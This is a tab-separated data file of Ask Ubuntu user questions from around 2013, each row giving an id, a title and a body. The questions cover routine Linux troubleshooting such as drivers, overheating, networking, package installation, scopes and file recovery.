310511	why my php scripts does n't get executed ?	i have this html page on my pc < html > < body > < form action= '' http : //localhost/welcome.php '' method= '' post '' > name : < input type= '' text '' name= '' fname '' > age : < input type= '' text '' name= '' age '' > < input type= '' submit '' > < /form > < /body > < /html > and this php script in my /var/www folder < html > < body > welcome < ? php echo $ _post [ `` fname '' ] ; ? > ! < br > you are < ? php echo $ _post [ `` age '' ] ; ? > years old . < /body > < /html > my php script is correct , but when i submit the output is only welcome ! you are years old that is its not echoing the form.. ie . the script isnt getting the data . where should i put the welcome.php to output the correct data ?
310516	how can i stop my laptop from shutting down unexpectedly ?	my laptop has shut down several times while using youtube after short periods of time . i can feel heat coming from the bottom . just before it shuts off it displays a black screen with some text on it , lasting about a second . i 'm running xubuntu 12.04 . i have tried running it on both adobe flash player as well as html5 . the only proprietary driver it has is for the wifi card . laptop is running dual boot with windows vista . do n't know my way around linux too well , so simple explanations would be much appreciated . system specifications ( in case they might be helpful in diagnosis ) : dell inspiron 1525 ( from 2008-09 ) intel celeron 2.00 ghz 2gb memory 32 bit 110-ish gb hdd graphics card is `` mobile intel 965 express chipset family '' think i got what you were talking about entered grep -ie `` ( emergency|temperature ) '' /var/log/syslog got jun 20 01:19:24 ubuntu kernel : [ 3617.333801 ] critical temperature reached ( 99 c ) , shutting down . jun 20 01:34:21 ubuntu kernel : [ 867.196196 ] critical temperature reached ( 99 c ) , shutting down . jun 20 02:43:52 ubuntu kernel : [ 1708.282274 ] critical temperature reached ( 99 c ) , shutting down . those are the three times it over heated -- entirety of it : yaser @ ubuntu : ~ $ grep -ie `` ( emergency|temperature ) '' /var/log/syslog jun 20 01:05:19 ubuntu kernel : [ 2772.442355 ] cpu0 : core temperature above threshold , cpu clock throttled ( total events = 1 ) jun 20 01:05:19 ubuntu kernel : [ 2772.443338 ] cpu0 : core temperature/speed normal jun 20 01:14:22 ubuntu kernel : [ 3314.933437 ] cpu0 : core temperature above threshold , cpu clock throttled ( total events = 7 ) jun 20 01:14:22 ubuntu kernel : [ 3314.934428 ] cpu0 : core temperature/speed normal jun 20 01:19:22 ubuntu kernel : [ 3614.942666 ] cpu0 : core temperature above threshold , cpu clock throttled ( total events = 27260 ) jun 20 01:19:22 ubuntu kernel : [ 3614.943649 ] cpu0 : core temperature/speed normal jun 20 01:19:24 ubuntu kernel : [ 3617.333801 ] critical temperature reached ( 99 c ) , shutting down . jun 20 01:20:26 ubuntu kernel : [ 0.515893 ] cpu0 : core temperature above threshold , cpu clock throttled ( total events = 1 ) jun 20 01:20:26 ubuntu kernel : [ 0.516881 ] cpu0 : core temperature/speed normal jun 20 01:26:10 ubuntu kernel : [ 376.280224 ] cpu0 : core temperature above threshold , cpu clock throttled ( total events = 11 ) jun 20 01:26:10 ubuntu kernel : [ 376.281204 ] cpu0 : core temperature/speed normal jun 20 01:34:20 ubuntu kernel : [ 866.633368 ] cpu0 : core temperature above threshold , cpu clock throttled ( total events = 12689 ) jun 20 01:34:20 ubuntu kernel : [ 866.634349 ] cpu0 : core temperature/speed normal jun 20 01:34:21 ubuntu kernel : [ 867.196196 ] critical temperature reached ( 99 c ) , shutting down . jun 20 02:41:51 ubuntu kernel : [ 1587.408477 ] cpu0 : core temperature above threshold , cpu clock throttled ( total events = 1 ) jun 20 02:41:51 ubuntu kernel : [ 1587.409462 ] cpu0 : core temperature/speed normal jun 20 02:43:52 ubuntu kernel : [ 1708.282274 ] critical temperature reached ( 99 c ) , shutting down . thanks a ton for the help cleaned fan works smoothly now , could n't figure out the amd propriety driver though
310517	install text mode ubuntu	i have to run four oss simultaneously and do not need graphical desktop . and i have only ubuntu desktop cd . is it possible to install ubuntu desktop without graphical environment ?
310527	how do i search recursively for a phrase in odt files	i have a folder with subfolders in it and many libreoffice documents ( .odt ) . i need to find in which one there 's a particular phrase . i tried grep -ir `` search phrase here '' . but it only found the search phrase in an xml file . is there a way to search in documents that are not plain text files ?
310529	is possible to force only deluge to connect via pptp ?	is it possible to use my primary internet connection for all the traffic and force only deluge to connect via pptp ?
310530	ubuntu for android phone/tablet	i have an android smartphone , sony xperia neo l , and an android tablet , lenovo thinkpad tablet 1838-a19 . can i just change my os to ubuntu , since the sony xperia do n't have docking nor hdmi port ? if , i can change the os from android to ubuntu where did on earth i could download the instalation master file ? and would you just give me any link to step-by-step ubuntu instalation over android . thx in advance
310537	bash script for custom message	i 'm trying to send an email using bash script . i tried using the following in the bash script with no success as i execute the script it asks for cc : # ! /bin/bash recipient= '' tarun @ gmail.com '' mail -s `` this is a test mail '' `` $ recipient '' but nothing seems to work as i want it to be automated . also i want to send a message with the mail i went through different tutorials but in every tutorial a message is written in a text file then the file is sent but ca n't i write a message with the mail command itself and not save it to any file and send it . please help . p.s . i just want the script to do the following if a particular operation is complete then it sends an email to the recipient with a subject and a message saying operation is completed successfully .
310543	how do i move ubuntu 13.04 from real storage to virtualbox ?	i want to move my ubuntu 13.04 into the virtualbox storage . paragon backup & recovery can prepare windows for moving into virtual storage . but i can not find any analogue for linux . can you give me advice , please ?
310544	compilation problem for c++ program	how do i install g++ or pentium builder packages ? do i need to download those ? because when i try to compile the program and with this statement : g++ -wall -w -werror main.cpp -o helloworldcpp` this is showing that it needs packages , i.e . g++ and pentium builder , so what should i do ?
310550	12.04 lts 2 without screensaver ?	i do n't know if this has to do with xorg-xserver-bug currently ? ( at a friend 's notebook ) screensaver resp . xscreensaver are installed but it does not appear in the system-settings as tool - for to be adjusted ?
310559	how to install cuttlefish in ubuntu 13.04	i have tried the following command to install cuttlefish sudo add-apt-repository ppa : noneed4anick/cuttlefish but it did not work.tell me if there is any other way to install cuttlefish
310569	what 's the status of ubuntu tablet in june 2013 ?	there 's been lots of talk about ubuntu tablet but , aside from the nexus , there 's been little action . what 's the status of ubuntu tablet universal in mid-june 2013 ?
310572	edup ep-n8531 wireless usb nano adapter driver install	i bought me an edup ep-n8531 nano wireless usb stick to upgrade my netbook , which has an built-in rt3090 that causes problems . background : the rt3090 is working under lubuntu 13.04 , but it has connection losses . i already tried different solutions , also compiling the driver myself , but nothing worked how it should . i do n't want to hack my way to get wlan working anymore and bought the stick . my router is wireless n draft capable and other devices are working pretty fine with it - windows machines and android smartphones . the stick is delivered with a driver cd for several platforms . there 's also a linux driver . but the driver is a single file called '2011_0719_rt3070_rt3370_rt5370_rt5372_linux_sta_v2.5.0.3_dpo ' . how do i install it ? just put it under lib/firmware ? can anyone help me ? lsusb says the chip is an ralink rt5370 . the staging driver works but has very very poor performance - only works with the router in the same room . if the chip causes bigger problems with linux , i could use it for some old pc and just buy another stick . the edup stick was about just 7âź . could anyone recommend a good piece of linux wireless hardware ? thanks .
310574	how to create own commands for the terminal ?	my question is the one which is written in the title . i installed a program ( teamspeak 3 client ) on my ubuntu 12.04 lts clientversion system . now i would like to start it in the terminal with the command `` teamspeak3 '' . the program is installed in `` /opt/teamspeak3/ '' and i am new on linux . so how to create such a command ? so it would be really nice , if someone could help me : ) thanks a lot !
310575	how can i use a ws-scan device with ubuntu os and variants ?	although i 'm fairly sure this is not network scanner/printer specific , i 'm attempting to use this with an oki mc342dn . it also has a `` network twain '' option ( among many others ) but wsd-scan seems to function ( properly/poorly ) with windows machines on the network already . anyway , i would have been happy if xsane could talk to it like other network scanners i 've had on the network but , if it can , i do n't know how to make it .
310576	rhythmbox wo n't play radio stations from 13.04	it has been a long time since i last tried , but rhythmbox wo n't play the radio stations that used to play perfectly well . i have n't tried for > 6 months . the station i want to hear is mms : //s67wm.castup.net/990310008-52.wmv , but no other station works either . if i run it under vlc , it works fine . it could be that i used banshee long ago which was replayed by rhythmbox - i simply do n't remember . my question is : can anyone verify that rhythmbox does indeed play radio stations ? the advantage of rhythmbox is that it does n't take any extra space on the icon bar , since it is always running . i like the idea of being completely unobtrusive , and it used to work beautifully . thanks , ilan
310581	little conflict between xorg-xserver and gnome-control-center ?	in gnome-control-center with 'brightness and locks ' - suspending of screen is set to 30 minutes . but after 30 minutes linux is then crashing and i have to reboot . have then settled bug-report . seems to be a conflict between xorg-xserver ( video ? ) and 'brightness and locks ' . ( now it crashed again ? with logging out to gdm ? - 12.04 lts2 here - )
310586	what is the significance of $ and { } in `find $ { x } *`	i have the following : x=/ find $ { x } * now this is similar to find / * what is the significance of $ and { } in find $ { x } *
310589	how do i install the drivers for my canon pc-d320 printer ?	i 've got a printer , which is not listed in the list of drivers for ubuntu . the printers name is : canon pc-d320 so how do i install the drivers ? where can i find them ?
310592	do-release-upgrade fails on ubuntu 11.10	i 'm running ubuntu 11.10 on a virtual host . i 've tried upgrading to a newer version by running do-release-upgrade but the process fails with the following error ( s ) . err http : //ppa.launchpad.net precise/main translation-en err http : //ppa.launchpad.net precise/main translation-en err http : //ppa.launchpad.net precise/main sources err http : //ppa.launchpad.net precise/main amd64 packages err http : //ppa.launchpad.net precise/main i386 packages err http : //ppa.launchpad.net precise/main translation-en err http : //ppa.launchpad.net precise/main translation-en err http : //ppa.launchpad.net precise/main translation-en err http : //ppa.launchpad.net precise/main sources 404 not found err http : //ppa.launchpad.net precise/main amd64 packages 404 not found err http : //ppa.launchpad.net precise/main i386 packages 404 not found err http : //ppa.launchpad.net precise/main translation-en err http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en fetched 0 b in 0s ( 0 b/s ) error during update a problem occurred during the update . this is usually some sort of network problem , please check your network connection and retry . w : failed to fetch http : //ppa.launchpad.net/ferramroberto/java/ubuntu/dists/precise/main/source/sources 404 not found , w : failed to fetch http : //ppa.launchpad.net/ferramroberto/java/ubuntu/dists/precise/main/binary-amd64/packages 404 not found , w : failed to fetch http : //ppa.launchpad.net/ferramroberto/java/ubuntu/dists/precise/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . restoring original system state
310597	nvidia driver break unity , gnome anything - even after uninstall	so i 'm having this issue , i 'm using a i7 laptop with an intel graphics card , and a nvidia hdmi card for external displays . the cursor flickers and sometimes dissapears when i have my external monitor plugged in , the external monitor works , but it lags my cursor . i tried installing the nvidia-current driver and this broke everything , the menus and bars are missing . when uninstalling the nvidia driver , it 's still in the same state . can anyone purpose something ?
310599	how to set up a virtual server and install ubuntu on it ?	after installing virtual box , i need to set up a virtual server and install ubuntu on it . what steps should i take ?
310600	password not required	i have a password set on my laptop running 12.10 smoothly , but the password requirement on boot from suspend or hibernation has vanished . it is still required for sudoing or boot from full shutdown . how can i get my password back ? require password on wake is enabled , so that 's not the problem . also , in lightdm.conf there is no line saying autologin-user= . i ca n't exactly comment out a blank line . suspend/hibernate is enabled from the regular menu and both function correctly .
310601	putty x11 proxy : wrong authorisation protocol attempted	i am using putty from windows vista to connect to ubuntu server and run my qtcreator using xming . i am able to log-in into the server , but i am unable to run qtcreator . the following message appears : putty x11 proxy : wrong authorisation protocol attempted putty x11 proxy : wrong authorisation protocol attempted putty x11 proxy : wrong authorisation protocol attempted putty x11 proxy : wrong authorisation protocol attempted qtcreator : can not connect to x server localhost:10.0 so , i search on the net and i found this link , and i tried to follow the answer . however , when i execute xauth list nothing is shown . accordingly , xauth list command should return me the key ( and i dont know what this key is ) . this key should be added later to xauth . eventually everthing shouold go fine and i should be able to run qtcreator . so , in plain english , why this error happens ? and why xauth is not returning anything ? and finally what is this key ?
310604	e : unable to locate package juju-core	i am following https : //juju.ubuntu.com/get-started/ but when i run first command in this guide ubuntu give me following error . superc @ ubuntu : ~ $ sudo apt-get install juju-core reading package lists ... done building dependency tree reading state information ... done e : unable to locate package juju-core superc @ ubuntu : ~ $ i am using ubuntu server 12.04.2 lts in my vmplayer . can anyone help me please . thanks
310619	problems running dhclient	after running apt-get upgrade and restarting an ubuntu server install i noticed the computer did n't have a network connection . i checked ifconfig ~ $ ifconfig lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:7376 errors:0 dropped:0 overruns:0 frame:0 tx packets:7376 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1424 ( 1.4 kb ) tx bytes:1424 ( 1.4 kb ) the interface 'em1 ' was missing : / so i tried ifconfig em1 up which brought the interface up and then dhclient em1 to get an ip address , but i ran into this error : ~ $ dhclient em1 dhclient : error while loading shared libraries : libc.so.6 : failed to map segment from shared object : permission denied ~ $ dhclient dhclient : error while loading shared libraries : libc.so.6 : failed to map segment from shared object : permission denied does anyone have any idea what could be wrong ? a number of people seemed to have issues with selinux blocking dhclient , but even with setenforce 0 i get this issue . i 've used dhclient to manually bring up an interface on this computer before so i 'm not sure what suddenly changed ( and what changed to stop the interfacing auto-setting up on startup ) . edit : the network adapter is fine and everything works when the ip/route/nameservers are set manually reinstalling isc-dhcp-client and isc-dhcp-common did n't help , nor did reinstalling libc6 edit2 : i tried gertvdijk 's suggestions . my /etc/network/interfaces is : auto lo iface lo inet loopback allow-hotplug em1 iface em1 inet dhcp i tried sudo ifup em1 but i get the same error : ( ~ $ sudo ifup em1 dhclient : error while loading shared libraries : libc.so.6 : failed to map segment from shared object : permission denied failed to bring up em1 .
310620	kmymoney missing menu bar	the other day i started kmymoney only to find that the menu bar was missing . i 've tried everything i can think of with no luck . i 've been looking on-line for several days now , also with no luck . ive even tried re-installing it but the issue still remains . i 'm new to ubuntu tho i 've been using it since april and i 'm now a true convert ! my greatest fear is that this is going to be something very simple and i 'm going to have wasted everyones precious time . i 'm running ubuntu 12.04 ( precise ) 32-bit with gnome 3.4.2 and my version of kmymoney is 4.6.3 . i 'm happy to supply any further information required and greatly appreciate the time and effort anyone gives to what i hope turns out to be the ignorance of a novice user .
310640	i can not install wifi fern ?	i am having problems installing wifi fern @ ubuntu : ~/desktop $ sudo dpkg -i fern-wifi-cracker_1.6_all.deb selecting previously unselected package fern-wifi-cracker . ( reading database ... 187540 files and directories currently installed . ) unpacking fern-wifi-cracker ( from fern-wifi-cracker_1.6_all.deb ) ... dpkg : dependency problems prevent configuration of fern-wifi-cracker : fern-wifi-cracker depends on aircrack-ng ; however : package aircrack-ng is not installed . fern-wifi-cracker depends on subversion ; however : package subversion is not installed . dpkg : error processing fern-wifi-cracker ( -- install ) : dependency problems - leaving unconfigured processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... errors were encountered while processing : fern-wifi-cracker @ ubuntu : ~/desktop $ can you help please ?
310652	./ 1.cpp commands gives error : bash : ./ : is a directory	after vi 1.cpp i write my c++ program . g++ 1.cpp -o 1.out works fine . but ./ 1.out gives error : bash : ./ : is a directory
310654	unable to install ubuntu 12.10 / 12.04 on windows 8	i am trying to install ubuntu 12.10 or 12.04 on my dell e4310 notebook it is currently running windows 8 and i want to dual boot but the ubuntu wo n't install : ( i have prepared the usb correctly and it runs at start up then gets stuck when ubuntu is loading for the first time . can anyone please help me ? : (
310660	what are smart scopes ?	i 've heard ubuntu 13.10 will ship smart scopes technology . what are smart scopes ?
310662	when using a vpn should connection info . say `` ipv6 ignored '' ?	when i use wifi with a vpn connection , is it normal for the connection info . box to say ' ipv 6 ignored ' ? does this mean that the vpn connection is working normally ?
310663	is any personal or sensitive data collected as part of the smart scopes server ?	the smart scopes technology implies submitting search queries online for them to be processed by the smart scopes server from canonical . is any personal or sensitive data collected as part of the smart scopes server ?
310665	problems with apt-get update ( -11 -system error ) and github	i am having some problems when running apt-get update : w : failed to fetch http : //br.archive.ubuntu.com/ubuntu/dists/raring/release.gpg something wicked happened resolving 'br.archive.ubuntu.com : http ' ( -11 - system error ) e : some index files failed to download . they have been ignored , or old ones used instead . also , when i try to push something to github i receive this error : error : could n't resolve host 'github.com ' while accessing https : //github.com/lapl/hardl1.git/info/refs ? service=git-receive-pack fatal : http request failed when i am at university it works fine . any help on fixing this ?
310667	what opportunities do scopes offer to mobile operators ?	mobile phone operators are often concerned with providing a means to provide differentiation in the os they ship , while not increasing the maintenance cost due to potential fragmentation . this might be something that ubuntu touch can help with with the scopes technology . what are the benefits of scopes in ubuntu ?
310669	what programming languages are scopes written in ?	i 'd like to get started writing a scope for ubuntu . what programming languages are available and what should i choose ?
310671	start ubuntu without a desktop environment but start an x application	i want to do a small computer just for internet browsing . i dont want to load a desktop environment to keep ram , cpu and gpu ussage as low as possible . the computer is going to run on a arm cpu . i dont care with distro i use , i thought about good old plain debian .
310672	how do i debug my unity scope ?	i 've started writing a scope for the unity dash , but it seems not to return results . i 'd like to find out why : how can i debug my scope ?
310677	where is the contacts folder ?	i have ubuntu 13.04 installed on my notebook and i want to make a backup of `` contacts '' but can not find the location of the folder or location where data is located , to specify the exact path . i do not want to backup all my documents that are already supported in ubuntuone , only `` contacts '' .
310680	how does one burn an iso image to a dvd using windows 8 ? specifically ubuntu 12.04lts	i 'm trying to create a bootable dvd for ubuntu 12.04lts using a windows 8 machine . the download of the .iso went well , but now i need to burn it to a dvd . instructions for windows 7 say to right click on the .iso file and then select windows disc image burner . no such option appears on win 8 . any suggestions ?
310681	how do i import a rhythmbox playlist into spotify ?	i have some playlists on rhythmbox that i would like to import in spotify but i could not find a way . there 's this website called ivy that lets you import platlists that are in csv files or in itunes ' format ( whatever format that is ) , but it does not support importing playlists in .pls format . i also could not find a way to convert a .pls file to .csv . is there a way to copy a playlist from rhythmbox to spotify ?
310683	how do i uninstall/remove `` unity websites integration '' from firefox extensions ?	what package do i have to uninstall to remove the firefox extension entry `` unity websites integration '' ?
310686	how to install dashlane on ubuntu ?	i use the password manager dashlane on windows . however , i can not use the same on ubuntu . i tried installing it using wine but it did n't help . can anybody suggest alternative methods ?
310696	recover files from lost+found to original location	please help me . i am in a trouble . after i performed a `` fsck '' system check my ubuntu automatically goes to initramfs prompt . everything from my home folder was removed . i came to know that all files are moved to lost+found folder . now please someone help me how to recover files of my home folder from lost+found folder .
310697	changing my password	i bought a used pc which happened to have linux as its operating system . i like it so far . however , i can only log on as a guest . it asks for a password which i do not have . i contacted the person who sold me the computer . here is his reply : try to add a 1 to the username and use that as a password . example : username : tiger password : tiger1 i do n't see a user name listed on the login screen . my question : how do i set my own password or better yet , drop the need for one ?
310699	will netflix work on ubuntu 12.04	i want to play my netflix with my ubuntu 12.04 but before i download the player and screw something up i thought i would ask . i have not done anything yet .
310701	how do i disable the speaking of `` link '' after reading a hyperlink in orca ?	i am trying to find out whether it is possible to disable the feature in gnome-orca , that speaks 'link ' after reading text that is a link . it is kinda frustrating to listen to orca read a sentence , and stop every other word to tell me it 's a link when i 'm on wikipedia . if anyone has any ideas , that would be great . i am using : orca version 3.4.2 , mozilla firefox 21.0 , and ubuntu 12.04 lts thanks in advance
310705	some fast way to save and restore tabs of terminal ?	i have a terminal window with a dozen named tabs open . i would like to save the current configuration and have it restored with names and directories . is there a way to do this ?
310708	need to create a backup server to backup some windows files	i need to create a backup server to backup some windows files ( .xls , .doc and etc ... ) . it will be backup 10 windows pc ( xp/7 ) every half hour . those files will be on a few directories on those computer . as we dont have much budget so i am thinking to use a desktop pc with ubuntu server installed on it to act for backup server . i have some experience on setting up web server on ubuntu server but not too sure what spec i need to get for a backup server to handle this tasks . i am thinking to use deltacopy for the windows pc and link to ubuntu server . but however , this process only can backup those saved files ... but what about those unsaved files ? is there anyway for me to backup both saved and unsaved files ? ( files would be 100-200mb altogether . ) backup the whole windows ? but then this will be too big to backup as we wants to do backup every 30 minutes or 60 minutes . any suggestion ? thanks
310709	which scopes are available in the default ubuntu installation ?	after i 've installed ubuntu , which scopes are readily available to return results from the dash ?
310712	where is the code that handles copy and paste in x ?	suppose i wanted to extend the functionality of the copy / paste between different windows , which library / package is the source-code actually in ?
310717	how do i improve gui performance on amd e2-3200 apu ?	i have an amd e2-3200 apu ( integrated radeon gpu in cpu ) , running ubuntu 12.10 ( generic ubuntu image , linux 3.5 kernel ) . my ubuntu works too slow on gui related process . i wonder what is the best to do to get better performance here ? lshw -c video shows that it uses radeon driver . ps -ef | grep compiz shows that it uses compiz . i did metacity -- replace to disable compiz , however the gui was not usable after executing that command ( desktop and folders disappeared , window 's menu and gui related buttons disappeared ) .
310718	data lost after installing ubuntu . any chance of recovery ?	while upgrading from ubuntu 12.04 to 13.04 and i used those default options `` delete ubuntu and install '' but unfortunately all my other partitions also got deleted and they got combined into one in which ubuntu is installed is there anyway to recover data ?
310722	can software for ubuntu desktop work on ubuntu touch unmodified ?	i have software that works on ubuntu 12.10 desktop . would it run also on ubuntu touch ? specifically , i 'm trying to use opencfu on a ubuntu tablet . i just want to know if it would work ; whether it would be able to satisfy all the dependencies like gtk etc . using the terminal .
310728	wordpress mysql physical files .myd not in /var/lib/mysql/dbname	i installed wordpress on my home server ( multisite install + varnish cache ) . now i 'm looking into /var/lib/mysql/dbname to recover the mysql files , and here is what i find : all the important tables does n't have the .myd ! ! ! db.opt wp_easymail_stats.frm wp_2_commentmeta.frm wp_easymail_subscribers.frm wp_2_comments.frm wp_easymail_unsubscribed.frm wp_2_easymail_recipients.frm wp_gsom_subscribers.frm wp_2_easymail_stats.frm wp_links.frm wp_2_easymail_subscribers.frm wp_newsman_email_templates.frm wp_2_easymail_unsubscribed.frm wp_newsman_lists.frm wp_2_links.frm wp_newsman_lst_default.frm wp_2_ngg_album.frm wp_ngg_album.frm wp_2_ngg_gallery.frm wp_nggcf_fields.frm wp_2_ngg_pictures.frm wp_nggcf_fields_link.frm wp_2_options.frm wp_nggcf_field_values.frm wp_2_postmeta.frm wp_ngg_gallery.frm wp_2_posts.frm wp_ngg_pictures.frm wp_2_subscribe2.frm wp_options.frm wp_2_term_relationships.frm wp_postmeta.frm wp_2_terms.frm wp_posts.frm wp_2_term_taxonomy.frm wp_registration_log.frm wp_2_wysija_campaign.frm wp_signups.frm wp_2_wysija_campaign_list.frm wp_site.frm wp_2_wysija_campaign_list.myd wp_sitemeta.frm wp_2_wysija_campaign_list.myi wp_term_relationships.frm wp_2_wysija_campaign.myd wp_terms.frm wp_2_wysija_campaign.myi wp_term_taxonomy.frm wp_2_wysija_email.frm wp_usermeta.frm wp_2_wysija_email.myd wp_users.frm wp_2_wysija_email.myi wp_wysija_campaign.frm wp_2_wysija_email_user_stat.frm wp_wysija_campaign_list.frm wp_2_wysija_email_user_stat.myd wp_wysija_campaign_list.myd wp_2_wysija_email_user_stat.myi wp_wysija_campaign_list.myi wp_2_wysija_email_user_url.frm wp_wysija_campaign.myd wp_2_wysija_email_user_url.myd wp_wysija_campaign.myi wp_2_wysija_email_user_url.myi wp_wysija_email.frm wp_2_wysija_form.frm wp_wysija_email.myd wp_2_wysija_form.myd wp_wysija_email.myi wp_2_wysija_form.myi wp_wysija_email_user_stat.frm wp_2_wysija_list.frm wp_wysija_email_user_stat.myd wp_2_wysija_list.myd wp_wysija_email_user_stat.myi wp_2_wysija_list.myi wp_wysija_email_user_url.frm wp_2_wysija_queue.frm wp_wysija_email_user_url.myd wp_2_wysija_queue.myd wp_wysija_email_user_url.myi wp_2_wysija_queue.myi wp_wysija_form.frm wp_2_wysija_url.frm wp_wysija_form.myd wp_2_wysija_url_mail.frm wp_wysija_form.myi wp_2_wysija_url_mail.myd wp_wysija_list.frm wp_2_wysija_url_mail.myi wp_wysija_list.myd wp_2_wysija_url.myi wp_wysija_queue.frm wp_2_wysija_user_field.frm wp_wysija_queue.myd wp_2_wysija_user_field.myd wp_wysija_queue.myi wp_2_wysija_user_field.myi wp_wysija_url.frm wp_2_wysija_user.frm wp_wysija_url_mail.frm wp_2_wysija_user_history.frm wp_wysija_url_mail.myd wp_2_wysija_user_history.myd wp_wysija_url_mail.myi wp_2_wysija_user_history.myi wp_wysija_url.myd wp_2_wysija_user_list.frm wp_wysija_url.myi wp_2_wysija_user_list.myd wp_wysija_user_field.frm wp_2_wysija_user_list.myi wp_wysija_user_field.myd wp_2_wysija_user.myd wp_wysija_user_field.myi wp_2_wysija_user.myi wp_wysija_user.frm wp_blogs.frm wp_wysija_user_history.frm wp_blog_versions.frm wp_wysija_user_history.myd wp_commentmeta.frm wp_wysija_user_history.myi wp_comments.frm wp_wysija_user_list.frm wp_domain_mapping.frm wp_wysija_user_list.myd wp_domain_mapping_logins.frm wp_wysija_user_list.myi wp_ean_newsletter.frm wp_wysija_user.myd wp_easymail_recipients.frm wp_wysija_user.myi do you have an idea from where i could recover these .myd files ? my articles are stored inside so quite a big amount of work . and why precisely all the most important tables does n't have their.myd meanwhile the wordpress extension wysija not important at all has its all ? i ca n't believe the bad luck !
310729	how to make an xinput command persistent after standby	i want to use two finger scrolling on my touchpad . i 'm using ubuntu 13.04 , and the mouse and touchpad gui configuration does n't let me enable it ( the checkbox is greyed out ) . as a workaround , i created a script that is run on startup per the advice . the script is : xinput set-int-prop `` synps/2 synaptics touchpad '' `` two-finger scrolling '' 8 1 xinput set-int-prop `` synps/2 synaptics touchpad '' `` synaptics two-finger scrolling '' 8 1 1 xinput set-int-prop `` synps/2 synaptics touchpad '' `` synaptics two-finger pressure '' 32 0 this works fine after i log in . however , when i sleep and resume , the setting seems to disappear -- two finger scrolling is no longer enabled . some solutions ( e.g . ) suggest using synclient and xorg.conf , but those do n't seem to work . other solutions ( e.g . ) add scripts that are run upon resuming from sleep . this seems like the wrong way to go about it -- there should be a way to make permanent changes without having to re-tweak them on every resume . does anyone have a permanent way to enable two finger scrolling ?
310730	downloading ubuntu server for x86 architecture	i ca n't seem to find the x86 64 bit download for ubuntu server 12.04 . i am taken to a download page easily enough , but the download file is confusingly named `` ubuntu- 12.04-server-amd64.iso.crdownload . does this contain the x86 installation or do i need another iso i ca n't find ?
310734	ubuntu 13.04 amd/intel hybrid graphics dual screen problems	after switching to ubuntu 13.04 64bit , amd proprietary drivers stopped working on my laptop with amd/intel hybrid graphics . i tried installing older version of intel graphics as described in this thread how do i get amd/intel hybrid graphics drivers to work ? . this solution works great with one monitor , but when i try to connect second one while using discrete card , my screen starts flickering and glitching very hard . it 's hard to explain , seems like it tries to intersect two screens . i noticed , that command sudo aticonfig -- set-pcs-str= '' ddx , enablerandr12 , false '' failed to deactivate randr1.2 , so there 's no display manager in amdcccle . i tried to search a solution for disabling randr , but found none working . i had none of these problems on ubuntu 12.10 64bit . any help is appreciated . thank you .
310736	connect to a l2tp server from ubuntu server 13.04	i need to establish connection with the l2tp-server ( vpn ) from my ubuntu server 13.04 machine in order to gain access to the internet . how can i do this ? i can find a lot of guides how to do this using gui and some network manager plugin , but how can i do this only using a shell ? this connection must be established on system boot and kept up all the time . later on i will have to share it with the local clients using nat ( internet connection sharing ) .
310746	disable the overlay scrollbar ubuntu 12.04	i have just installed the ubuntu on my machine , i heard every thing is possible with linux , i found the scrollbar is very complex , and hard to use , is there is any way to disable it ? and put it as in normal look ?
310754	ati radeon xpress 1200 graphics card driver install problems	i 've got an ati radeon xpress 1200 graphics card , and the default driver is n't cutting it . i downloaded the proprietary driver .run file ( `` ati-driver-installer-9-3-x86.x86_64.run '' ) from amd , and tried to run it with sudo sh ati-driver-installer-9-3-x86.x86_64.run . everytime i try and to it i get this error : error : ./default_policy.sh does not support version default : v2 : i686 : lib : :none:3.8.0-25-generic ; make sure that the version is being correctly set by -- iscurrentdistro i do n't know what 's throwing it , and i would really appreciate some help . thanks in advance ! : )
310756	how do i view packages that i have installed	i want to be able to view packages that i have installed . i do n't want it to be every package on my computer but just the ones i got from ubuntu software center and sudo apt-get install .
310762	xfce panels - change autohide delay ?	i 'm trying to set a panel up for a small touch screen and i have a shortcut which toggles autohide , enabling autohide makes it appear , but on disabling autohide there 's a short delay which is annoying . using xfce4 panels , there is no way i can find within the gui of changing the autohide delay . are there any configuration files etc i could edit to achieve this ?
310767	how should i install apache tomcat 7 for use with eclipse ?	which way should i install apache tomcat 7 on my ubuntu : using sudo apt-get install tomcat7 from the zip file downloaded from apache website . i do n't want the server to start on each boot . as most of the time i will be using it in my eclipse to run simple web applications . so , do i need to install it any other way to avoid tomcat start automatically ?
310769	no boot option after install alongside windows 8	i correctly managed to burn the install iso to flash drive , booted to it , installed it , and it told me that i simply needed to restart . however , on boot it gives me no option to boot to ubuntu partition but boots directly to windows 8 without option . no partition selection , nothing . loading the acer/windows boot menu only allows me to select the hard drive , not the partitions in it . any suggestions ? thanks in advance . edit : could software like asus instant-on be causing a problem ?
310771	minetest wo n't install	every time i try to install minetest from a .deb package , it says this afert processing triggers for desktop-file-utils ... errors were encountered while processing : /home/collinc/downloads/minetestc55_0.4.7-0ppal~raring1_i386.deb i need 0.4.7 , not 0.3.1 like they have in the software center . any fixes ? i am running lubuntu 13.04 .
310772	a couple of questions about ubuntu	i have a couple of questions : are my files safe when i upgrade ( from the update manager ) from 12.04 to 13.04 ? are my files safe if i upgrade from the 13.04 install disc ? are my files safe if i dual-boot windows with ubuntu ? can i use multi-boot ? more than two oss on my hard disk ( 3tb , 2tb , 1tb ) is there a book for transitioning from windows to ubuntu ? also , could you answer without using any technical jargon ? i 'm a newbie to ubuntu .
310783	how can i speed up my computer , now that i 've installed linux ?	can i delete my windows 7 software , as well as any old files that linux does n't require to run ? i 'm new to linux . if i can , where/how do i delete it ?
310786	ubuntu 12.04 automatic updates and backups do not work anylonger	i noticed that available updates are not longer alerted via the update manager in unity . the same happens to the backup , that is actually scheduled to be done daily , but this does never happen . how do i get them back ? best regards sten
310787	how to use skype on ubuntu 13.04	i installed skype 4.2 but now i can not use it at all . i can not install the skype wrapper or can not get the skype icon to show in the top right panel . right now it is unusable if i close the app window . i need to disable skype from htop and start it all over again . does any one know if there is a way to enable the skype wrapper or show the icon on the panel ? thank you in advance .
